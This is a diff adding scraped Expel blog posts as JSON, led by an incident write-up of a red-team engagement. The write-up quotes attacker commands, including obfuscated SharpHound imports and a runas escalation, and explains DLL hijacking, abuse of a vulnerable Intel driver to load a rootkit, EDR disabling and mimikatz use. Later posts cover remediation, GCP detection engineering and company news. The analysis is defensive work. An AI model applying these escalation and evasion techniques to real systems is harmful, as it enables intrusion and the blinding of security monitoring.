PowerShell command was successful, it would have executed the Invoke-ShareFinder function provided by powerview.ps1. With a clear indication of malicious activity, it was time to notify our customer. Our analysts have a direct line of communication with our customers (through Slack or Microsoft Teams depending on which platform they use) \u2013 so within eight minutes, we went from initial alert to giving our customer details of the activity. Then our analysts initiated a verification drop to our customer through the Expel Workbench\u2122. From there, our customer authorized the activity and confirmed that a red team assessment was underway. Want to know what our verification drop looks like? Here\u2019s the Slack message to our customer: Verification communication with customer over Slack And below is our Alert-to-fix timeline, available for our customers in the Expel Workbench\u2122. Expel Workbench\u2122 alert-to-fix report Signs of a rootkit: Start of our investigation TL;DR: The installation of a suspicious Windows Driver immediately stood out to us when examining the host timeline. This activity would provide an attacker with unrestricted access to memory on the computer. During our initial escalation and communication, we also generated a timeline for the Compromised_Host endpoint. After inspecting the timeline generated through the EDR solution running on the computer, something immediately stood out to us. EventName : CreateService ComputerName : Compromised_Host ProductType : 1 ServiceDisplayName : GuteDriver ServiceErrorControl_decimal : 1 ServiceImagePath : C:\\Users\\User1\\Desktop\\Purple\\Payloads\\bp\\Gute0.2\\Gute0.2\\GuteDriver.sys ServiceStart : 4 ServiceType : 1 Time : 2021-04-20T15:33:56.794+0000 GuteDriver Rootkit Service Creation This Windows service creation event tells us that GuteDriver.sys is being registered as a kernel driver, set to begin execution during system initialization based on the values of ServiceType and ServiceStart . This means that the red team got kernel-level access to the computer system. Gaining kernel-level access allows unrestricted access to all working memory (aka RAM) on the computer system. Malware that operates at this level is also referred to as a rootkit. The file hash for GuteDriver.sys, obtained from the corresponding FileWrite event, was globally unique in the EDR product and unknown in VirusTotal and other OSINT sources. Also, the fact that the Driver\u2019s location ran through User1\u2019s Desktop was a huge red flag. It\u2019s a complete anomaly for a Windows kernel driver to be located on a user\u2019s desktop. Initial red team activity TL;DR: The red team, which provided physical access to the Compromised_Host system and a logon session for User1, began their engagement by downloading Payloads.zip from dl.boxcloud.com. With the malicious Windows driver activity identified, we continued to examine the host timeline with the initial tasks of locating the beginning of the red team activity and any potential lateral movement to other computer systems. While no signs of successful lateral movement were present in the timeline, we noticed a series of file write events involving the path C:\\Users\\User1\\Desktop\\Purple\\Payloads. We then honed in on the events related to this path and determined that the earliest evidence of red team activity occurred earlier in the day at 14:33 UTC on the Compromised_Host computer system with the downloading of the file Payloads.zip into the Downloads folder of User1. This activity was immediately preceded by User1 launching a Chrome web browser process at 14:29 UTC, which then generated a DNS request for dl.boxcloud.com. This timeline of events suggests that it\u2019s highly likely that the archive file was hosted on and downloaded from the cloud storage service Box.com. The contents of Payloads.zip were then extracted into a new folder, Payloads, located within the folder Purple on User1\u2019s Desktop. These extracted files were the source of additional tools and tactics deployed by the red team, which we\u2019ll be exploring together in the next sections of this blog post. System reconnaissance TL;DR: The red team used PowerShell and DotNet to locate local privilege escalation opportunities on the Compromised_Host endpoint. The first events after the extraction of the contents of Payloads.zip are the compilation and immediate deletion of a DotNet Framework module with a file name of ibuyy111.dll. Dotnet Module Compilation Event: DeviceHarddiskVolume4WindowsMicrosoft.NETFramework64v4.0.30319csc.exe \"C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe\" /noconfig /fullpaths @\"C:UsersUser1AppDataLocalTempibuyy111.cmdline\" File Creation Time: 4/20/2021 14:36:25 UTC File Deletion Time: 4/20/2021 14:36:25 UTC ibuyy111.dll details With a parent process of PowerShell.exe and the immediate deletion of the compiled DotNet module, this command line directly correlates to PowerShell invoking the C# Command-Line Compiler behind the scenes as a result of importing a new DotNet class through C# source code (yes \u2013 PowerShell can do that). This functionality is made possible through the add-type PowerShell cmdlet, which supports inline C# source code through the TypeDefinition parameter. powershell -Command \u201cAdd-Type -TypeDefinition \u201dpublic class Demo {public int a;}\u201d To find out more about the PowerShell activity on the host, we used the PSReadLine console history file, which maintains a record of PowerShell commands entered into an interactive PowerShell console session for each user account. This file exists so that the PSReadLine module, which is included by default with Windows 10, can provide command line history functionality for PowerShell in-line with the Linux BASH shell. From the PSReadLine console history file for User1 we saw that the following command was entered: Import-Module .Vscanner.ps1 > Vulns.txt While this evidence source does not include timestamps, based on the creation time of the Vulns.txt file we had from the timeline, this command was likely the origin of the DotNet module activity. Based on the name Vscanner.ps1 and created file names Vulns.txt, along with interesting paths.txt, the main objective of Vscanner.ps1 and ibuyy111.dll was discovering potential privilege escalation vulnerabilities on the Compromised_Host computer system. Blockedfailed executions TL;DR: The red team attempted but failed to perform a DNS Zone Transfer and had additional reconnaissance tools blocked by EDR. After they succeeded at enumerating local privilege opportunities, the red team failed in their next three execution attempts. The first of these attempts was a failed DNS Zone Transfer, followed by the previously mentioned blocked attempt to download and execute PowerView, which was our initial lead into the presence of the red team. The third unsuccessful execution activity was two attempts to bypass detection of the SharpHound tool by employing obfuscation. SharpHound is the C# version of BloodHound , a penetration testing tool for enumerating active directory accounts and how their permissions overlap through graph theory. The red team attempted to import and execute two different obfuscated copies of SharpHound as a PowerShell module, a fact supported by the PSReadLine history file excerpt provided below. Both attempts were detected and blocked by EDR, which also created an Expel Alert. Import-Module .sh-obf1.ps1 Import-Module .sh-obf2.ps1 invokE-BloOdhOuNd Import-Module .sh-obf2.ps1 invokE-BloOdhOuNd Bloodhound related section of PSReadLine History File Privilege escalation TL;DR: The red team used DLL load order hijacking to execute a custom DLL file under the Local System account and then create a new local admin user. They likely got the information used to conduct this local privilege escalation from VScanner.ps1. Following this series of failed execution attempts, the red team then used information likely gained from their earlier successful privilege escalation enumeration. At 15:09 UTC, the red team wrote the WptsExtensions.dll file extracted from Payloads.zip into the directory C:Program FilesCitrixICAService in order to establish DLL load order hijacking. We spotted this when comparing the following two FileWrite events for WptsExtensions.dll, which have the same file hash. EventName : FileWrite ComputerName : COMPROMISED_HOST FileName : WptsExtensions.dll FilePath : DeviceHarddiskVolume4UsersUser1DesktopPurplePayloadsPayloads CompleteFilePath : DeviceHarddiskVolume4UsersUser1DesktopPurplePayloadsPayloadsWptsExtensions.dll SHA256Hash: 9f2470188c30deec39f042fddfdb94bef1e69fb7b842858de7172f5e6d58140e Time : 2021-04-20T14:34:08 EventName : FileWrite ComputerName : COMPROMISED_HOST FileName : WptsExtensions.dll FilePath : DeviceHarddiskVolume4Program FilesCitrixICAService CompleteFilePath : DeviceHarddiskVolume4Program FilesCitrixICAServiceWptsExtensions.dll SHA256Hash: 9f2470188c30deec39f042fddfdb94bef1e69fb7b842858de7172f5e6d58140e Time : 2021-04-20T15:09:23 FileWrite events for WptsExtensions.dll Following this DLL load order hijacking setup, several Citrix-related service processes were started, which would have likely loaded this DLL, running under the SYSTEM user context. This activity was then preceded by the User1 account launching a new cmd process under the context of the LocalAdmin1 account. DeviceHarddiskVolume4WindowsSystem32runas.exe runas /user:LocalAdmin1 cmd Privilege escalation to local admin account The red team report \u2013 a summary of actions performed during the engagement \u2013 confirmed that this malicious DLL used the higher permissions obtained through DLL load order hijacking to covertly create a new local admin account on the computer system. Kernel memory access TL;DR: The red team installed and exploited an old Intel driver to bypass the Windows Driver Signature Enforcement protection and install their own custom driver. Using this custom code running in the kernel memory space, the red team disabled the EDR solution running on the endpoint. As the title suggests, things escalated quickly. With their privileges on the Compromised_Host system elevated to local administrator, the red team wasn\u2019t yet satisfied with their heightened control of the system. Working through the LocalAdmin1 account, the red team disabled two local services running on the Compromised_Host system \u2013 a Splunk forwarder service and a service for a third-party IR vendor. Then they launched the executable program Gute.exe at 15:29 UTC, another file hash with zero global matches in the EDR solution and across OSINT. The EDR details for this event let us know that the Gute.exe process was responsible for both writing and registering the Windows Driver file NalDrv.sys at 15:31 UTC. The hash for this file \u2013 4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b \u2013 did return results when searching across Virustotal and other OSINT sources. VirusTotal Match for the NalDrv.sys file hash The NalDrv.sys file, original file name iQVW64.SYS, is a signed Intel driver from 2013 that isn\u2019t inherently malicious. What this driver can provide an attacker is based on a combination of its valid driver signature and established vulnerability #CVE-2015-2291 . This combination allows an attacker to turn the authentic driver into a vehicle to access and modify kernel-level memory on the local computer system. An example of this technique is the Kernel Driver Utility , which includes this exact CVE as one of the vulnulbilies it can leverage to provide access into kernel memory from user mode. One of the many things you can do with this unrestricted level of access is bypass the Windows Driver Signature Enforcement and load any driver of your choosing into kernel mode This Gute.exe and NalDrv.sys activity brings us back full circle to the unknown Gutedriver.sys file mentioned earlier in this post, which was installed as a Windows driver service two minutes after the NalDrv.sys activity at 15:33 UTC. We didn\u2019t notice anything happening on the Compromised_Host system after this activity. The red team report confirmed that this system kernel-level access was used to disable the EDR solution running on Compromised_Host. With the red team activity limited to the Compromised_Host and our visibility cut off with the disabling of EDR, we concluded our investigation. The red team report also showed us that the red team successfully executed mimikatz and obtained plaintext passwords after disabling EDR on the host. In a real-world critical incident, the box would have been isolated prior to the activity that provided the red team access to kernel-level memory. However, it\u2019s common practice not to disrupt red teams during their engagements because it ensures security controls across the attack lifecycle are examined regardless of results in the previous phase. Quick recap We just went through a lot of technical info. To make it easier to digest, we figured it would be helpful to give a short recap of what went down. Below is a detailed timeline of this red team incident, broken down into both their actions on the computer system Compromised_Host and our communications with the customer during the incident. Red team incident timeline What this means for you This red team engagement serves as a strong reminder that the alert is often the tipping point, but not the full story. While the incident began with an unsophisticated PowerShell download cradle, it quickly escalated into something that could have been a serious incident in the real world. If this was a real attack, it would have been difficult for any org to prevent and contain. That\u2019s especially true when considering a custom rootkit was deployed and EDR was disabled on the system. Bad actors are getting creative and have the ability to surprise you with novel attack techniques. This is why you need to have an equally creative mindset when it comes to detection and investigation. And, again, it\u2019s why we love red teams. Bringing in a red team to test your security controls and protocols against the latest tactics can help you keep bad actors out down the road. Have any interesting red team stories you\u2019d like to share? We\u2019d love to hear them! Let\u2019s chat (yes \u2013 a real human will respond)." +} \ No newline at end of file diff --git a/how-does-your-approach-to-aws-security-stack-up.json b/how-does-your-approach-to-aws-security-stack-up.json new file mode 100644 index 0000000000000000000000000000000000000000..1b89433ecbca314da89bb4827d4f57b9b9b87e6b --- /dev/null +++ b/how-does-your-approach-to-aws-security-stack-up.json @@ -0,0 +1,6 @@ +{ + "title": "How does your approach to AWS security stack up?", + "url": "https://expel.com/blog/how-does-your-approach-to-aws-security-stack-up/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG How does your approach to AWS security stack up? Security operations \u00b7 1 MIN READ \u00b7 MASE ISSA \u00b7 APR 27, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools Keeping track of Amazon Web Services (AWS) and its new services can be overwhelming. And on top of dealing with a tangled web of services and logs, triaging alerts can feel like you\u2019re playing an exhausting game of whack-a-mole. Nodding your head in agreeance? You aren\u2019t alone. We\u2019ve heard the same thing from many orgs, regardless of size and industry \u2013 wrangling cloud security signal isn\u2019t easy. To put it mildly. It can be time consuming, confusing and downright frustrating. Wondering if you might need some help? Or want to know if there are opportunities to level up but not sure where to start? We got you. Introducing Expel\u2019s interactive quiz to help you figure out if you\u2019re getting the most out of your Amazon Web Services (AWS) security signal. Answer a few short questions and we\u2019ll let you know how you compare to similar orgs. As a bonus we\u2019ll give you some tips and resources. So whether you\u2019re just starting out or pretty sure you\u2019re killing the game \u2013 check out our quiz to make sure you\u2019re maximizing all available resources to secure your cloud. Protect AWS" +} \ No newline at end of file diff --git a/how-expel-does-remediation.json b/how-expel-does-remediation.json new file mode 100644 index 0000000000000000000000000000000000000000..31f727e9661ef8b7e1eb2016793646d7d7752967 --- /dev/null +++ b/how-expel-does-remediation.json @@ -0,0 +1,6 @@ +{ + "title": "How Expel does remediation", + "url": "https://expel.com/blog/how-expel-does-remediation/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG How Expel does remediation Security operations \u00b7 4 MIN READ \u00b7 NABEEL ZAFAR AND PATRICK DUFFY \u00b7 MAY 31, 2022 \u00b7 TAGS: MDR TL;DR How our two-step remediation process works (with a flowchart), what we can remediate, and how we keep you in the loop. Who does what \u2013 Expel or you? (Hint: most of the time, you decide.) Our remediation roadmap (Blocking command-and-control (C2) communications, cloud turnoffs, disabling/modifying AWS access keys). Tips on what to ask any MDR provider about remediation. \u201cIf you find a problem in our environment, how do you remediate it?\u201d We get that question a lot. As we should \u2014 that\u2019s one of the most important questions to ask when you\u2019re looking for a managed detection and response (MDR) provider. So here\u2019s our answer to this question. In this blog post, we\u2019ll share Expel\u2019s two-step remediation process, provide insight into our automated remediation offerings, and give you a glimpse of what\u2019s ahead on our roadmap. Our remediation process If we identify an incident, there are two sets of actions we\u2019ll take \u2013 while keeping you in the loop throughout the process. First, we\u2019ll take approved actions on your behalf to quickly address the incident. For example, the Expel Workbench\u2122 can automatically perform host containment, user account disablement, block known bad hashes, or remove suspicious emails when necessary during our security operations center (SOC) analysts\u2019 investigation. If these automated remediation actions make sense, we quickly take first steps to contain infected hosts. In the image below, you\u2019ll see an example of what this looks like in the Expel Workbench. Expel Workbench host containment action You can also customize the remediation process through Workbench (see image below) by identifying hosts that you\u2019d like us to act on \u2014 and any you don\u2019t \u2014 for future remediation actions. They also share updates on their activity in Workbench each step of the way. Expel Workbench containment options Expel supports host containment for customers who have CrowdStrike, Microsoft Defender for Endpoint, SentinelOne Singularity Complete, VMware Carbon Black Cloud, VMware Carbon Black EDR, Palo Alto Cortex XDR Pro, Elastic Endpoint Security, and Cybereason. Second, after taking automatic actions on your behalf, our SOC analysts recommend additional remediation actions in our findings report. We always communicate in plain English, so our recommendations are easy to follow and can be implemented at any level of security expertise. Want a 10-second overview of what our remediation process looks like? We got you covered. Check out our remediation workflow in the diagram below. Expel remediation workflow Me or my MDR: Who does what? A lot of security practitioners who\u2019ve purchased MDR services still want to maintain internal control of remediation steps. It helps reduce business risk. We get it. We\u2019ve found that our process strikes a balance between what security practitioners want to handle themselves and what they\u2019d want their MDR to do. But that doesn\u2019t mean they shouldn\u2019t look to their MDR to share their expertise. We want your team to maximize your security and minimize incidents \u2014 and not spend a ton of time trying to figure out how to remediate. So if we spot trends in vulnerabilities or incidents across your environment, we\u2019ll tailor resilience recommendations for how your org can fix the root cause of those issues and prevent them from needing remediation time after time. Taking steps to improve your security and keep those types of incidents from happening again helps us avoid having to call you in the middle of the night about remediation actions you need to take \u2014 right now! What else can we auto remediate? From business email compromise to malicious files to ransomware, we\u2019ve got you covered. You tell us what you\u2019d like us to remediate and which ones you\u2019d prefer to handle. Plus, 24\u00d77 coverage means you have the time to plan your next steps\u2026 even if that means waiting until Monday morning. Our approach to automated remediation is personal to your organization and based on the frequency of threats seen in your environment. You\u2019re in control of which users and endpoints you\u2019d like us to immediately take offline after a compromise is confirmed, so you\u2019re involved when you want to be \u2014 freeing up your team to focus on other security initiatives. We have a few new automated remediation steps (in addition to the ones outlined above) that consist of additional actions we can automatically take for you when responding to an incident. Removing malicious email If malicious email is identified from a phishing submission, we\u2019ll automatically remove it from users\u2019 inboxes (and into the trash). Available for: Google Workspace Blocking bad hashes When our analysts identify hashes to block during an incident, we create a remediation action in Expel Workbench. If the hash isn\u2019t on your \u201cnever block\u201d list of files, Workbench adds the hash to the appropriate block list in your EDR. Available for: CrowdStrike, VMware Carbon Black Cloud, VMware Carbon Black Response, Microsoft Defender for Endpoint, SentinelOne Singularity Complete, Palo Alto Cortex XDR Pro and Elastic Endpoint Security. Disabling user accounts Similar to host containment, Workbench will automatically disable user accounts when that remediation action is added to an incident. Available for: Microsoft Defender for Endpoint, Microsoft Office 365, Microsoft Azure Identity Protection, Microsoft Active Directory, Microsoft Azure Log Analytics, and Microsoft Azure, Google Workspace, Okta, Github, and Duo. Coming soon We\u2019ve talked you through our remediation process today. But we\u2019re constantly improving what we can do for our customers. So we have a few new automated remediation steps in the works on our remediation roadmap. They consist of additional actions we\u2019ll be able to automatically take for you while responding to an incident. By taking critical, first steps to contain an incident, we decrease your remediation time even further \u2014 lifting more weight off your shoulders. Here\u2019s what\u2019s next in the pipeline, prioritized based on how often we take certain remediation actions across our customer base and the level of risk each presents for our customers. Blocking command-and-control (C2) communications When our SOC identifies C2 communications during an incident, we\u2019ll automatically block them upon creation of a remediation action in Workbench. Available for: Palo Alto Networks, Cisco Umbrella Cloud turn-offs If a cloud instance is identified as compromised during an incident, we\u2019ll automatically shut down the VM or EC2. Available for: AWS EC2 turn-off, Azure VM turn-off Disabling/modifying AWS access keys If an AWS access key is identified as compromised during an incident, we\u2019ll automatically disable/modify that key when a remediation action is created. Available for: AWS Final tips We wanted to end this post with some parting thoughts and tips for those currently looking for an MDR provider. When you\u2019re evaluating MDR providers, make sure you understand how their remediation process works. Will they reduce risk quickly enough to protect your org? What will they do for you when it comes time to remediate an incident vs. what will you be asked to do? Learn about their incident reporting and communication process to know when and how they\u2019ll reach you during an investigation. And make sure you also know how they\u2019ll walk you through remediation. Have any questions? Let\u2019s chat !" +} \ No newline at end of file diff --git a/how-expel-goes-detection-sprinting-in-google-cloud.json b/how-expel-goes-detection-sprinting-in-google-cloud.json new file mode 100644 index 0000000000000000000000000000000000000000..c0a4e007c1c654fa188fa1285c66826d09bab224 --- /dev/null +++ b/how-expel-goes-detection-sprinting-in-google-cloud.json @@ -0,0 +1,6 @@ +{ + "title": "How Expel goes detection sprinting in Google Cloud", + "url": "https://expel.com/blog/detection-sprinting-google-cloud/", + "date": "Aug 3, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG How Expel goes detection sprinting in Google Cloud Security operations \u00b7 6 MIN READ \u00b7 IAN COOPER, CHRISTOPHER VANTINE AND SAM LIPTON \u00b7 AUG 3, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools Let\u2019s face it: Detection and response in the cloud is greenfield. Although it feels like every other month we\u2019re reading about the latest cloud compromise, there are often few details about exactly what happened and what you can do to prevent the same kind of thing happening to you. Follow @sellingshakes Organizations are just getting comfortable figuring out where their attack surface really is in the cloud. For these reasons, Expel\u2019s approach to detection research has required some creativity. How does one build a detection strategy essentially from scratch? In our case, we like to work together to fundamentally understand a new technology, get up to date with where the community has taken the threat research, theorize any additional threat models against that tech and then build a strong overall detection strategy as a team. The Detection and Response Engineering team at Expel in many ways operates like a software team. To help us organize work, we use the Scrum framework and generally operate in one or two week \u201csprints\u201d \u2013 timeboxed iterations of our detection strategies. Recently, we ran a two week Google Cloud Platform (GCP) detection sprint and wanted to share our process. Interested in how you can start building a strategy of your own? Strap in and we\u2019ll take you along for the journey to building this process here at Expel. Our process for building detections Threat modeling and threat research is no small task. We like to take some time here and we usually take the entire first week of our detection sprints to do some reading (hello API docs!), let ideas bake, challenge each other and do any sort of experimentation in cloud infrastructure environments to test security boundaries. In general, our process follows the steps below. Ideate: Throw ideas against a wall. Evaluate: Test the ideas. Create: Release the dragons. Appreciate: Celebrate (and monitor performance). Ideate It all starts with finding inspiration and brainstorming detection ideas. Oftentimes, our detection sprints build upon previous iterations of detection work and research, and the result is a deeper understanding of the technology at hand (and it\u2019s security shortcomings). Follow @iank_cooper One good place to start with GCP, or any cloud infrastructure, is understanding their implementation of Identity and Access Management (IAM). If you\u2019re feeling green in GCP and want to learn how GCP IAM compares to the other cloud providers, Dylan Ayrey and Allison Donovan break it down very well in the beginning of their Defcon talk . In fact, we\u2019ll use one of the attack techniques discussed in their talk as an example as we walk through our detection sprint process. GCPloit, a python-based red team tool built by the Defcon presenters, serves to exploit potential imbalances in a given GCP environment. (In fact, cloud red team tools are great starting points to build an initial suite of threat detections). Specifically, the tool takes advantage of the ability to impersonate service accounts \u2013 a dangerous, yet common privilege in GCP. Picking apart the code for GCPloit reveals the specific gcloud commands used to list available service accounts, deploy cloud functions attached to each available service account (necessary to expose the service account credentials), and ultimately capture the credentials to each service account. From there, the attacker can use the service account credentials to impersonate even more accounts, or use the new privileges gained to continue moving towards their goals in a variety of other ways. As discussed in the Defcon talk, it\u2019s possible for an attacker to gain access to multiple GCP projects through this process. Now it\u2019s time to see if we can build a successful detection based on this functionality. Evaluate Once we understand GCP IAM and some of the most impactful security weaknesses at hand, we build and evaluate detections in our testing environment. With cloud detections, one part of our evaluation process includes determining if the detection is looking for attacker behaviors or simply detecting risky configuration changes (although the lines between the two are often blurred). There\u2019s no shortage of open source detections for risky cloud configuration changes. There\u2019s also a whole market that specializes in these (Cloud Security Posture Management anyone?). Our goal for this sprint was to find evil. Plain and simple. We were all in agreement on which attack paths are the scariest and remain readily available for an adversary (malicious service account impersonation\u2026 begone you dastardly monster\u2026). Multiple GCP detection sprints have resulted in detection ideas for a variety of malicious service account impersonation behaviors. Here\u2019s a few examples: Burst in cloud function deployments: Is an attacker programmatically capturing service account credentials? Unusual cloud functions: Are cloud function deployments unusual for this user? Service accounts making org level policy changes: Is an attacker leveraging stolen credentials to gain additional access in the environment? Back to the detection we\u2019re focusing on \u2013 a service account impersonation detection. Remember, cloud functions deployments can be used by the attacker to capture new credentials while impersonating a service account. So what data do we need to effectively write a detection for this? Let\u2019s hone in on what native log data exists in GCP . Finding the right sources of evidence GCP provides several log sources, but not all translate into effective detection sources. System Event audit logs: Capture machine data, but not user actions. Data Access audit logs: Record granular resource access (typically not enabled due to high volume). Admin Activity audit logs: Capture control plane changes (including user actions). For these particular attacker behaviors, the Admin Activity log includes the evidence we need to write our detections. Since these logs capture configuration changes to resources in GCP, they give us insights into the events we want to correlate when searching for evil. For example, when a cloud function is deployed, we can track this activity through the Admin Activity audit log. Create Now, it\u2019s time to write some detections. Meet Josie, our own python-based detection engine we use here at Expel. Let\u2019s walk through what service account impersonation detection logic looks like for Josie to evaluate. Snippet of Expel detection logic relating to bursts in cloud function deployments At a high level, this logic is watching for any instance of a cloud function deployment, and recording the user responsible for the event. Josie will remember the user responsible for this action for 15 minutes. If the same user deploys over three unique cloud functions in that 15-minute window, Josie will generate an alert for analysts to look into the activity. To make sure this detection logic is sound, we\u2019ll deploy this detection in a draft state to allow us to see how it performs. Based on its performance, we may decide to adjust the detection threshold or suppress users associated with frequent/programmatic cloud function deployments. Once we\u2019ve written a detection and released it into our testing environment, we like to track the detection\u2019s performance in Datadog to measure patterns and general volume. The Datadog visual below makes it pretty obvious to tell which detections needed some work and when they were dialed in. Datadog graph tracking the volume of Expel\u2019s GCP alerts in the testing/development phase After making tweaks to the draft detections to adjust for volume, and ensuring they detect a real threat scenario, we prepare to release the detections into production. Preparing for release means ensuring that the detection has a strong description, suggested triage steps, references and decision support (through the help of our automated robot Ruxie). The goal is to have our analysts set up for success if the detection should trigger an alert. One final thing \u2013 any cowboy can shoot from the hip and come up with novel detection ideas. What\u2019s more challenging is pressure testing the investigative process for those detections. If you can\u2019t investigate it easily, then it\u2019s probably not a good alert to surface up to an analyst. With that said, any good detection should come prepackaged from the detection engineering team with some investigative questions attached to help triage any generated alerts. Appreciate Detections are out, queue the jazz hands. We still like to keep tabs on the newly released detections, however, and have Datadog monitors in place should any of the detections start behaving erratically. In good Scrum fashion, we like to retro our sprint process and look for ways to get better. After iterating upon our detection work and seeking to protect against both new and known threat scenarios, we\u2019re confident in our ability to tackle GCP attacks. Using service account impersonation as a shining example, our coverage for this threat scenario and other kinds of evil in GCP is now significantly stronger. Sprinting ahead When Expel started detection work on GCP, it was a whole new world to explore. Through detection sprints like this one, we can learn how IAM works in GCP (and other cloud platforms), grow our understanding of the attack surface as a team and build up a meaningful detection strategy. This is a reusable process that we\u2019ve found to work well no matter what tech is targeted. So if you find yourself in a similar situation (staring down a new area of risk with little detection inspiration to start from), following a similar iterative process of discovery, experimentation and keeping a close eye on your resulting detections should serve you well. As for us \u2013 we\u2019re on to the next one (and we\u2019ll keep sharing along the way)!" +} \ No newline at end of file diff --git a/how-expel-s-alert-similarity-feature-helps-our-customers.json b/how-expel-s-alert-similarity-feature-helps-our-customers.json new file mode 100644 index 0000000000000000000000000000000000000000..368d1b2358d06258e7eee1e6e39c0d3b95b4937f --- /dev/null +++ b/how-expel-s-alert-similarity-feature-helps-our-customers.json @@ -0,0 +1,6 @@ +{ + "title": "How Expel's Alert Similarity feature helps our customers", + "url": "https://expel.com/blog/how-expels-alert-similarity-feature-helps-our-customers/", + "date": "Aug 1, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG How Expel\u2019s Alert Similarity feature helps our customers Security operations \u00b7 4 MIN READ \u00b7 DAN WHALEN AND PETER SILBERMAN \u00b7 AUG 1, 2022 \u00b7 TAGS: MDR / Tech tools Building a security company and a corresponding product suite is a lot like building a house. If the foundational building blocks you\u2019ve created are solid, you should have a sturdy, reliable structure. And if you decide to expand your house in the future, those great foundational building blocks will help you build out faster while maintaining the top-notch structural integrity that you developed in the first place. Since we started our journey at Expel, we\u2019ve believed in this. That\u2019s why we\u2019ve invested in creating processes and tech that ensure our Expletives aren\u2019t burning out as we grow and that our customers don\u2019t see a decline in the level of service they expect. One of the features we recently built and released that helps us do all of this is something we call Alert Similarity. What is Alert Similarity, how did we get the idea for it, and how does it benefit our team of analysts (and, of course, our customers)? How it started Our bots, Josie and Ruxie, process millions of alerts each day, and thousands more show up on our analysts\u2019 screens. Given this volume, it\u2019s no surprise that many look similar to one another. For example, in a given week, our analysts typically review a few hundred alerts related to suspicious logins. If you see enough of this activity, you start to recognize common patterns and similarities (incidentally, humans are pretty good at pattern recognition). So we asked ourselves: Is it possible to teach Josie and Ruxie the same trick? What if we were to think about alerts and their corresponding evidence as documents? Could we compare similar \u201cdocuments\u201d and apply what a human did with one \u201cdocument\u201d and suggest or recommend a next step? Our hunch: comparing alerts to past activity (and corresponding outcomes) can provide valuable situational awareness. Imagine that our analysts identify a security incident on a Monday morning. Chris in accounting fell victim to a phishing attack \u30fc their credentials were stolen and had to be reset. On Thursday night, a different analyst is reviewing a new alert for Alice that looks similar. The situational awareness of what happened a few days ago and what the outcome was helps the analyst make the right decision for Alice\u2019s incident. This is a simple example, but here\u2019s where it gets really interesting: Imagine you\u2019re a security provider employing a distributed team of analysts who monitor many different environments, nearly a hundred different security technologies, and respond to many different kinds of activity. The pattern recognition that analysts are innately good at starts to break down with constant context switching \u30fc you can only expect a person to commit and recall so much information. By teaching our bots to recognize and surface similar alerts and their associated outcomes, we can let our analysts focus on what they do best: judgment and relationships. The result? We can improve quality and scale at the same time. This is how our Alert Similarity experiment was born. What is Alert Similarity, anyway? In short, Alert Similarity is a feature of Expel Workbench that helps us make high quality decisions at scale. We accomplish this by applying document similarity techniques to the security alerts we process \u2013 think of this as teaching our bots to recognize patterns and similarities between alerts. As a result, Ruxie can helpfully surface relevant historical context during alert triage, including a recommended action based on the decisions we\u2019ve made for similar activity in the past. Fast forward to today: What started as an experiment quickly turned into a unique and valuable Expel Workbench feature. How Alert Similarity benefits our analysts There are three specific ways that Alert Similarity benefits our team of analysts: #1: Instant suggestions based on past similar alerts One of the biggest benefits of Alert Similarity is that our analysts now receive dynamic suggestions in near-real time about new alerts based on similar alerts that our team has seen previously. Not only does this give our analysts more context when evaluating the right next step to take in an investigation, but it also gives us the benefit of personalizing our response to a specific type of alert in a customer\u2019s environment. For example, a customer might want PUP / PUA alerts categorized as policy violations instead of unwanted software. Our system then automatically learns to treat future, similar alerts as policy violations, automatically \u201csuggesting\u201d this to the analysts who manage that particular customer environment. #2: Enhanced quality control We pride ourselves on being at the forefront of quality control in security operations . This is incredibly important because, as we add new products and offerings, we want our analysts to learn from their mistakes as we scale our business. With Alert Similarity, we can look for clusters of similar alerts and identify when they result in different outcomes. We then push them into our quality control review process, where we review the alerts with a second set of eyes to determine if the correct actions were taken and whether there are any process improvements to be made. #3: New and improved detections With Alert Similarity, we now have a way to compare data we collect from customer environments against historical alerts that we know turned out to be true positive incidents. This capability helps with detection research and engineering. For example, if we compare a new event (or even an event from the past that wasn\u2019t deemed alert-worthy originally) to our known true positives, it can give us the insight we need to determine if we should write additional detections for customer environments. How it\u2019s going Our Alert Similarity feature launched in February 2022. The feedback we\u2019ve heard from our security operations center (SOC) about it so far is positive and early metrics show that the feature is working the way we\u2019d hoped \u2013 it\u2019s offering our analysts valuable suggestions about new alerts in the moment they\u2019re being reviewed, and it\u2019s saving our team time as they make decisions about the right next steps in an investigation. Take a look at our first read-out: We\u2019re also sharing some of these same metrics with our executive leadership team and board. Interested in creating your own version of Alert Similarity? In just a few months, our analysts \u2013 and in turn, our customers \u2013 are already benefiting from the introduction of Alert Similarity. That doesn\u2019t mean we\u2019re done. In fact, we\u2019re continuing to work on ways of improving the feature and using similar techniques to drive other features and use cases. Want to learn more about exactly how we built and tested Alert Similarity, and get some tips on how you might be able to develop something similar to benefit your own SOC? You\u2019re in luck \u2013 we created a technical walk-through." +} \ No newline at end of file diff --git a/how-expel-s-bold-erg-celebrated-black-contributions-to.json b/how-expel-s-bold-erg-celebrated-black-contributions-to.json new file mode 100644 index 0000000000000000000000000000000000000000..a2bb100ad4bd8423bda1c40a8a872b710df9966f --- /dev/null +++ b/how-expel-s-bold-erg-celebrated-black-contributions-to.json @@ -0,0 +1,6 @@ +{ + "title": "How Expel's BOLD ERG celebrated Black contributions to ...", + "url": "https://expel.com/blog/how-expels-bold-erg-celebrated-black-contributions-to-music-for-black-history-month/", + "date": "Mar 8, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG How Expel\u2019s BOLD ERG celebrated Black contributions to music for Black History Month Expel insider \u00b7 2 MIN READ \u00b7 NEIKO LAMPKIN \u00b7 MAR 8, 2023 \u00b7 TAGS: Careers / Company news The cybersecurity industry has an unfortunate reputation for lacking diversity. But we at Expel are out to change that, because we know we\u2019re better when different. We like to say that we\u2019re a stronger organization when we recognize, celebrate and learn from those whose backgrounds and perspectives are different from our own. To support that focus on diversity, Expel has a number of employee resource groups (ERGs) that nurture and bolster various communities of Expletives and their allies. These include WE (Women of Expel), The Treehouse (LGBTQ+ Expletives), The Connection (a community of Expletives focused on mental wellbeing), and BOLD (Black Opportunities for Learning and Development). Our BOLD ERG was excited to honor Black History Month in a particularly BOLD 